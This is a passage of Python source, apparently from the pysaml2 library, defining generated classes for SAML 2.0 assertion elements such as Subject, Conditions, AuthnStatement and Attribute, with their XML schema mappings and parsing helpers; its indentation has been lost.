self.encrypted_data = encrypted_data
self.encrypted_key = encrypted_key or []
def encrypted_element_type__from_string(xml_string):
return saml2.create_class_from_xml_string(EncryptedElementType_, xml_string)
class EncryptedID(EncryptedElementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedID element """
c_tag = 'EncryptedID'
c_namespace = NAMESPACE
c_children = EncryptedElementType_.c_children.copy()
c_attributes = EncryptedElementType_.c_attributes.copy()
c_child_order = EncryptedElementType_.c_child_order[:]
c_cardinality = EncryptedElementType_.c_cardinality.copy()
def encrypted_id_from_string(xml_string):
return saml2.create_class_from_xml_string(EncryptedID, xml_string)
class Issuer(NameIDType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Issuer element """
c_tag = 'Issuer'
c_namespace = NAMESPACE
c_children = NameIDType_.c_children.copy()
c_attributes = NameIDType_.c_attributes.copy()
c_child_order = NameIDType_.c_child_order[:]
c_cardinality = NameIDType_.c_cardinality.copy()
def issuer_from_string(xml_string):
return saml2.create_class_from_xml_string(Issuer, xml_string)
class AssertionIDRef(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AssertionIDRef element """
c_tag = 'AssertionIDRef'
c_namespace = NAMESPACE
c_value_type = {'base': 'NCName'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def assertion_id_ref_from_string(xml_string):
return saml2.create_class_from_xml_string(AssertionIDRef, xml_string)
class AssertionURIRef(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AssertionURIRef element """
c_tag = 'AssertionURIRef'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyURI'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def assertion_uri_ref_from_string(xml_string):
return saml2.create_class_from_xml_string(AssertionURIRef, xml_string)
class SubjectConfirmationDataType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationDataType
element """
c_tag = 'SubjectConfirmationDataType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['NotBefore'] = ('not_before', 'AsTime', False)
c_attributes['NotOnOrAfter'] = ('not_on_or_after', 'dateTime', False)
c_attributes['Recipient'] = ('recipient', 'anyURI', False)
c_attributes['InResponseTo'] = ('in_response_to', 'NCName', False)
c_attributes['Address'] = ('address', 'string', False)
c_any = {"namespace": "##any", "processContents": "lax", "minOccurs": "0",
"maxOccurs": "unbounded"}
c_any_attribute = {"namespace": "##other", "processContents": "lax"}
def __init__(self,
not_before=None,
not_on_or_after=None,
recipient=None,
in_response_to=None,
address=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.not_before = not_before
self.not_on_or_after = not_on_or_after
self.recipient = recipient
self.in_response_to = in_response_to
self.address = address
def subject_confirmation_data_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectConfirmationDataType_,
xml_string)
class KeyInfoConfirmationDataType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:KeyInfoConfirmationDataType
element """
c_tag = 'KeyInfoConfirmationDataType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{http://www.w3.org/2000/09/xmldsig#}KeyInfo'] = ('key_info',
[ds.KeyInfo])
c_cardinality['key_info'] = {"min": 1}
c_child_order.extend(['key_info'])
def __init__(self,
key_info=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.key_info = key_info or []
def key_info_confirmation_data_type__from_string(xml_string):
return saml2.create_class_from_xml_string(KeyInfoConfirmationDataType_,
xml_string)
class ConditionAbstractType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:ConditionAbstractType
element """
c_tag = 'ConditionAbstractType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
class Audience(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Audience element """
c_tag = 'Audience'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyURI'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def audience_from_string(xml_string):
return saml2.create_class_from_xml_string(Audience, xml_string)
class OneTimeUseType_(ConditionAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:OneTimeUseType element """
c_tag = 'OneTimeUseType'
c_namespace = NAMESPACE
c_children = ConditionAbstractType_.c_children.copy()
c_attributes = ConditionAbstractType_.c_attributes.copy()
c_child_order = ConditionAbstractType_.c_child_order[:]
c_cardinality = ConditionAbstractType_.c_cardinality.copy()
def one_time_use_type__from_string(xml_string):
return saml2.create_class_from_xml_string(OneTimeUseType_, xml_string)
class ProxyRestrictionType_(ConditionAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:ProxyRestrictionType element
"""
c_tag = 'ProxyRestrictionType'
c_namespace = NAMESPACE
c_children = ConditionAbstractType_.c_children.copy()
c_attributes = ConditionAbstractType_.c_attributes.copy()
c_child_order = ConditionAbstractType_.c_child_order[:]
c_cardinality = ConditionAbstractType_.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Audience'] = ('audience',
[Audience])
c_cardinality['audience'] = {"min": 0}
c_attributes['Count'] = ('count', 'nonNegativeInteger', False)
c_child_order.extend(['audience'])
def __init__(self,
audience=None,
count=None,
text=None,
extension_elements=None,
extension_attributes=None):
ConditionAbstractType_.__init__(
self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.audience = audience or []
self.count = count
def proxy_restriction_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ProxyRestrictionType_, xml_string)
class EncryptedAssertion(EncryptedElementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedAssertion element """
c_tag = 'EncryptedAssertion'
c_namespace = NAMESPACE
c_children = EncryptedElementType_.c_children.copy()
c_attributes = EncryptedElementType_.c_attributes.copy()
c_child_order = EncryptedElementType_.c_child_order[:]
c_cardinality = EncryptedElementType_.c_cardinality.copy()
def encrypted_assertion_from_string(xml_string):
return saml2.create_class_from_xml_string(EncryptedAssertion, xml_string)
class StatementAbstractType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:StatementAbstractType element
"""
c_tag = 'StatementAbstractType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
class SubjectLocalityType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectLocalityType element """
c_tag = 'SubjectLocalityType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['Address'] = ('address', 'string', False)
c_attributes['DNSName'] = ('dns_name', 'string', False)
def __init__(self,
address=None,
dns_name=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.address = address
self.dns_name = dns_name
def subject_locality_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectLocalityType_, xml_string)
class AuthnContextClassRef(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef element
"""
c_tag = 'AuthnContextClassRef'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyURI'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def authn_context_class_ref_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnContextClassRef, xml_string)
class AuthnContextDeclRef(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextDeclRef element """
c_tag = 'AuthnContextDeclRef'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyURI'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def authn_context_decl_ref_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnContextDeclRef, xml_string)
class AuthnContextDecl(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextDecl element """
c_tag = 'AuthnContextDecl'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyType'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def authn_context_decl_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnContextDecl, xml_string)
class AuthenticatingAuthority(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthenticatingAuthority
element """
c_tag = 'AuthenticatingAuthority'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyURI'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def authenticating_authority_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthenticatingAuthority,
xml_string)
class DecisionType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:DecisionType element """
c_tag = 'DecisionType'
c_namespace = NAMESPACE
c_value_type = {'base': 'string', 'enumeration': ['Permit', 'Deny',
'Indeterminate']}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def decision_type__from_string(xml_string):
return saml2.create_class_from_xml_string(DecisionType_, xml_string)
class ActionType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:ActionType element """
c_tag = 'ActionType'
c_namespace = NAMESPACE
c_value_type = {'base': 'string'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['Namespace'] = ('namespace', 'anyURI', True)
def __init__(self,
namespace=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.namespace = namespace
def action_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ActionType_, xml_string)
class AttributeValue(AttributeValueBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AttributeValue element """
c_tag = 'AttributeValue'
c_namespace = NAMESPACE
c_value_type = {'base': 'anyType'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
def attribute_value_from_string(xml_string):
return saml2.create_class_from_xml_string(AttributeValue, xml_string)
class EncryptedAttribute(EncryptedElementType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedAttribute element """
c_tag = 'EncryptedAttribute'
c_namespace = NAMESPACE
c_children = EncryptedElementType_.c_children.copy()
c_attributes = EncryptedElementType_.c_attributes.copy()
c_child_order = EncryptedElementType_.c_child_order[:]
c_cardinality = EncryptedElementType_.c_cardinality.copy()
def encrypted_attribute_from_string(xml_string):
return saml2.create_class_from_xml_string(EncryptedAttribute, xml_string)
class BaseID(BaseIDAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:BaseID element """
c_tag = 'BaseID'
c_namespace = NAMESPACE
c_children = BaseIDAbstractType_.c_children.copy()
c_attributes = BaseIDAbstractType_.c_attributes.copy()
c_child_order = BaseIDAbstractType_.c_child_order[:]
c_cardinality = BaseIDAbstractType_.c_cardinality.copy()
def base_id_from_string(xml_string):
return saml2.create_class_from_xml_string(BaseID, xml_string)
class NameID(NameIDType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:NameID element """
c_tag = 'NameID'
c_namespace = NAMESPACE
c_children = NameIDType_.c_children.copy()
c_attributes = NameIDType_.c_attributes.copy()
c_child_order = NameIDType_.c_child_order[:]
c_cardinality = NameIDType_.c_cardinality.copy()
def name_id_from_string(xml_string):
return saml2.create_class_from_xml_string(NameID, xml_string)
class SubjectConfirmationData(SubjectConfirmationDataType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationData
element """
c_tag = 'SubjectConfirmationData'
c_namespace = NAMESPACE
c_children = SubjectConfirmationDataType_.c_children.copy()
c_attributes = SubjectConfirmationDataType_.c_attributes.copy()
c_child_order = SubjectConfirmationDataType_.c_child_order[:]
c_cardinality = SubjectConfirmationDataType_.c_cardinality.copy()
def subject_confirmation_data_from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectConfirmationData,
xml_string)
class Condition(ConditionAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Condition element """
c_tag = 'Condition'
c_namespace = NAMESPACE
c_children = ConditionAbstractType_.c_children.copy()
c_attributes = ConditionAbstractType_.c_attributes.copy()
c_child_order = ConditionAbstractType_.c_child_order[:]
c_cardinality = ConditionAbstractType_.c_cardinality.copy()
def condition_from_string(xml_string):
return saml2.create_class_from_xml_string(Condition, xml_string)
class AudienceRestrictionType_(ConditionAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AudienceRestrictionType
element """
c_tag = 'AudienceRestrictionType'
c_namespace = NAMESPACE
c_children = ConditionAbstractType_.c_children.copy()
c_attributes = ConditionAbstractType_.c_attributes.copy()
c_child_order = ConditionAbstractType_.c_child_order[:]
c_cardinality = ConditionAbstractType_.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Audience'] = ('audience',
[Audience])
c_cardinality['audience'] = {"min": 1}
c_child_order.extend(['audience'])
def __init__(self,
audience=None,
text=None,
extension_elements=None,
extension_attributes=None):
ConditionAbstractType_.__init__(
self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.audience = audience or []
def audience_restriction_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AudienceRestrictionType_,
xml_string)
class OneTimeUse(OneTimeUseType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:OneTimeUse element """
c_tag = 'OneTimeUse'
c_namespace = NAMESPACE
c_children = OneTimeUseType_.c_children.copy()
c_attributes = OneTimeUseType_.c_attributes.copy()
c_child_order = OneTimeUseType_.c_child_order[:]
c_cardinality = OneTimeUseType_.c_cardinality.copy()
def one_time_use_from_string(xml_string):
return saml2.create_class_from_xml_string(OneTimeUse, xml_string)
class ProxyRestriction(ProxyRestrictionType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:ProxyRestriction element """
c_tag = 'ProxyRestriction'
c_namespace = NAMESPACE
c_children = ProxyRestrictionType_.c_children.copy()
c_attributes = ProxyRestrictionType_.c_attributes.copy()
c_child_order = ProxyRestrictionType_.c_child_order[:]
c_cardinality = ProxyRestrictionType_.c_cardinality.copy()
def proxy_restriction_from_string(xml_string):
return saml2.create_class_from_xml_string(ProxyRestriction, xml_string)
class Statement(StatementAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Statement element """
c_tag = 'Statement'
c_namespace = NAMESPACE
c_children = StatementAbstractType_.c_children.copy()
c_attributes = StatementAbstractType_.c_attributes.copy()
c_child_order = StatementAbstractType_.c_child_order[:]
c_cardinality = StatementAbstractType_.c_cardinality.copy()
def statement_from_string(xml_string):
return saml2.create_class_from_xml_string(Statement, xml_string)
class SubjectLocality(SubjectLocalityType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectLocality element """
c_tag = 'SubjectLocality'
c_namespace = NAMESPACE
c_children = SubjectLocalityType_.c_children.copy()
c_attributes = SubjectLocalityType_.c_attributes.copy()
c_child_order = SubjectLocalityType_.c_child_order[:]
c_cardinality = SubjectLocalityType_.c_cardinality.copy()
def verify(self):
if self.address:
# dotted-decimal IPv4 or RFC3513 IPv6 address
if valid_ipv4(self.address) or valid_ipv6(self.address):
pass
else:
raise ShouldValueError("Not an IPv4 or IPv6 address")
elif self.dns_name:
valid_domain_name(self.dns_name)
return SubjectLocalityType_.verify(self)
def subject_locality_from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectLocality, xml_string)
class AuthnContextType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextType element """
c_tag = 'AuthnContextType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextClassRef'] = (
'authn_context_class_ref', AuthnContextClassRef)
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextDecl'] = (
'authn_context_decl',
AuthnContextDecl)
c_cardinality['authn_context_decl'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContextDeclRef'] = (
'authn_context_decl_ref',
AuthnContextDeclRef)
c_cardinality['authn_context_decl_ref'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:assertion}AuthenticatingAuthority'] = (
'authenticating_authority', [AuthenticatingAuthority])
c_cardinality['authenticating_authority'] = {"min": 0}
c_child_order.extend(['authn_context_class_ref', 'authn_context_decl',
'authn_context_decl_ref', 'authenticating_authority'])
def __init__(self,
authn_context_class_ref=None,
authn_context_decl=None,
authn_context_decl_ref=None,
authenticating_authority=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.authn_context_class_ref = authn_context_class_ref
self.authn_context_decl = authn_context_decl
self.authn_context_decl_ref = authn_context_decl_ref
self.authenticating_authority = authenticating_authority or []
def verify(self):
# either <AuthnContextDecl> or <AuthnContextDeclRef> not both
if self.authn_context_decl:
assert self.authn_context_decl_ref is None
elif self.authn_context_decl_ref:
assert self.authn_context_decl is None
return SamlBase.verify(self)
def authn_context_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnContextType_, xml_string)
class Action(ActionType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Action element """
c_tag = 'Action'
c_namespace = NAMESPACE
c_children = ActionType_.c_children.copy()
c_attributes = ActionType_.c_attributes.copy()
c_child_order = ActionType_.c_child_order[:]
c_cardinality = ActionType_.c_cardinality.copy()
def action_from_string(xml_string):
return saml2.create_class_from_xml_string(Action, xml_string)
class AttributeType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AttributeType element """
c_tag = 'AttributeType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AttributeValue'] = (
'attribute_value',
[AttributeValue])
c_cardinality['attribute_value'] = {"min": 0}
c_attributes['Name'] = ('name', 'string', True)
c_attributes['NameFormat'] = ('name_format', 'anyURI', False)
c_attributes['FriendlyName'] = ('friendly_name', 'string', False)
c_child_order.extend(['attribute_value'])
c_any_attribute = {"namespace": "##other", "processContents": "lax"}
def __init__(self,
attribute_value=None,
name=None,
name_format=None,
friendly_name=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.attribute_value = attribute_value or []
self.name = name
self.name_format = name_format
self.friendly_name = friendly_name
def attribute_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AttributeType_, xml_string)
class SubjectConfirmationType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmationType
element """
c_tag = 'SubjectConfirmationType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}BaseID'] = ('base_id',
BaseID)
c_cardinality['base_id'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}NameID'] = ('name_id',
NameID)
c_cardinality['name_id'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedID'] = (
'encrypted_id',
EncryptedID)
c_cardinality['encrypted_id'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmationData'] = (
'subject_confirmation_data', SubjectConfirmationData)
c_cardinality['subject_confirmation_data'] = {"min": 0, "max": 1}
c_attributes['Method'] = ('method', 'anyURI', True)
c_child_order.extend(['base_id', 'name_id', 'encrypted_id',
'subject_confirmation_data'])
def __init__(self,
base_id=None,
name_id=None,
encrypted_id=None,
subject_confirmation_data=None,
method=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.base_id = base_id
self.name_id = name_id
self.encrypted_id = encrypted_id
self.subject_confirmation_data = subject_confirmation_data
self.method = method
def subject_confirmation_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectConfirmationType_,
xml_string)
class AudienceRestriction(AudienceRestrictionType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AudienceRestriction element """
c_tag = 'AudienceRestriction'
c_namespace = NAMESPACE
c_children = AudienceRestrictionType_.c_children.copy()
c_attributes = AudienceRestrictionType_.c_attributes.copy()
c_child_order = AudienceRestrictionType_.c_child_order[:]
c_cardinality = AudienceRestrictionType_.c_cardinality.copy()
def audience_restriction_from_string(xml_string):
return saml2.create_class_from_xml_string(AudienceRestriction, xml_string)
class AuthnContext(AuthnContextType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnContext element """
c_tag = 'AuthnContext'
c_namespace = NAMESPACE
c_children = AuthnContextType_.c_children.copy()
c_attributes = AuthnContextType_.c_attributes.copy()
c_child_order = AuthnContextType_.c_child_order[:]
c_cardinality = AuthnContextType_.c_cardinality.copy()
def authn_context_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnContext, xml_string)
class Attribute(AttributeType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:Attribute element """
c_tag = 'Attribute'
c_namespace = NAMESPACE
c_children = AttributeType_.c_children.copy()
c_attributes = AttributeType_.c_attributes.copy()
c_child_order = AttributeType_.c_child_order[:]
c_cardinality = AttributeType_.c_cardinality.copy()
def attribute_from_string(xml_string):
return saml2.create_class_from_xml_string(Attribute, xml_string)
class SubjectConfirmation(SubjectConfirmationType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectConfirmation element """
c_tag = 'SubjectConfirmation'
c_namespace = NAMESPACE
c_children = SubjectConfirmationType_.c_children.copy()
c_attributes = SubjectConfirmationType_.c_attributes.copy()
c_child_order = SubjectConfirmationType_.c_child_order[:]
c_cardinality = SubjectConfirmationType_.c_cardinality.copy()
def subject_confirmation_from_string(xml_string):
return saml2.create_class_from_xml_string(SubjectConfirmation, xml_string)
class ConditionsType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:ConditionsType element """
c_tag = 'ConditionsType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Condition'] = (
'condition',
[Condition])
c_cardinality['condition'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AudienceRestriction'] = (
'audience_restriction',
[AudienceRestriction])
c_cardinality['audience_restriction'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}OneTimeUse'] = (
'one_time_use',
[OneTimeUse])
c_cardinality['one_time_use'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}ProxyRestriction'] = (
'proxy_restriction',
[ProxyRestriction])
c_cardinality['proxy_restriction'] = {"min": 0}
c_attributes['NotBefore'] = ('not_before', 'dateTime', False)
c_attributes['NotOnOrAfter'] = ('not_on_or_after', 'dateTime', False)
c_child_order.extend(['condition', 'audience_restriction', 'one_time_use',
'proxy_restriction'])
def __init__(self,
condition=None,
audience_restriction=None,
one_time_use=None,
proxy_restriction=None,
not_before=None,
not_on_or_after=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.condition = condition or []
self.audience_restriction = audience_restriction or []
self.one_time_use = one_time_use or []
self.proxy_restriction = proxy_restriction or []
self.not_before = not_before
self.not_on_or_after = not_on_or_after
def verify(self):
if self.one_time_use:
assert len(self.one_time_use) == 1
if self.proxy_restriction:
assert len(self.proxy_restriction) == 1
return SamlBase.verify(self)
def conditions_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ConditionsType_, xml_string)
class AuthnStatementType_(StatementAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AuthnStatementType element """
c_tag = 'AuthnStatementType'
c_namespace = NAMESPACE
c_children = StatementAbstractType_.c_children.copy()
c_attributes = StatementAbstractType_.c_attributes.copy()
c_child_order = StatementAbstractType_.c_child_order[:]
c_cardinality = StatementAbstractType_.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}SubjectLocality'] = (
'subject_locality', SubjectLocality)
c_cardinality['subject_locality'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}AuthnContext'] = (
'authn_context', AuthnContext)
c_attributes['AuthnInstant'] = ('authn_instant', 'dateTime', True)
c_attributes['SessionIndex'] = ('session_index', 'string', False)
c_attributes['SessionNotOnOrAfter'] = ('session_not_on_or_after',
'dateTime', False)
c_child_order.extend(['subject_locality', 'authn_context'])
def __init__(self,
subject_locality=None,
authn_context=None,
authn_instant=None,
session_index=None,
session_not_on_or_after=None,
text=None,
extension_elements=None,
extension_attributes=None):
StatementAbstractType_.__init__(
self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.subject_locality = subject_locality
self.authn_context = authn_context
self.authn_instant = authn_instant
self.session_index = session_index
self.session_not_on_or_after = session_not_on_or_after
def authn_statement_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AuthnStatementType_, xml_string)
class AttributeStatementType_(StatementAbstractType_):
"""The urn:oasis:names:tc:SAML:2.0:assertion:AttributeStatementType
element """
c_tag = 'AttributeStatementType'
c_namespace = NAMESPACE
c_children = StatementAbstractType_.c_children.copy()
c_attributes = StatementAbstractType_.c_attributes.copy()
c_child_order = StatementAbstractType_.c_child_order[:]
c_cardinality = StatementAbstractType_.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}Attribute'] = (
'attribute',
[Attribute])
c_cardinality['attribute'] = {"min": 0}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedAttribute'] = (
'encrypted_attribute',
[EncryptedAttribute])
c_cardinality['encrypted_attribute'] = {"min": 0}
c_child_order.extend(['attribute', 'encrypted_attribute'])
def __init__(self,
attribute=None,
encrypted_attribute=None,
text=None,
extension_elements=None,
extension_attributes=None):
StatementAbstractType_.__init__(
self, text=text, extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.attribute = attribute or []
self.encrypted_attribute = encrypted_attribute or []
def attribute_statement_type__from_string(xml_string):
return saml2.create_class_from_xml_string(AttributeStatementType_,
xml_string)
class SubjectType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:SubjectType element """
c_tag = 'SubjectType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}BaseID'] = ('base_id',
BaseID)
c_cardinality['base_id'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}NameID'] = ('name_id',
NameID)
c_cardinality['name_id'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}EncryptedID'] = (
'encrypted_id', EncryptedID)
c_cardinality['encrypted_id'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:assertion}SubjectConfirmation'] = (
'subject_confirmation', [SubjectConfirmation])
c_cardinality['subject_confirmation'] = {"min": 0}
c_child_order.extend(['base_id', 'name_id', 'encrypted_id',
'subject_confirmation'])
def __init__(self,
base_id=None,
name_id=None,
encrypted_id=None,
subject_confirmation=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.base_id = base_id
self.name_id = name_id
self.encrypted_id = encrypted_id
self.subject_confirmation = subject_confirmation or []
def subject_type__from_string(xml_string):
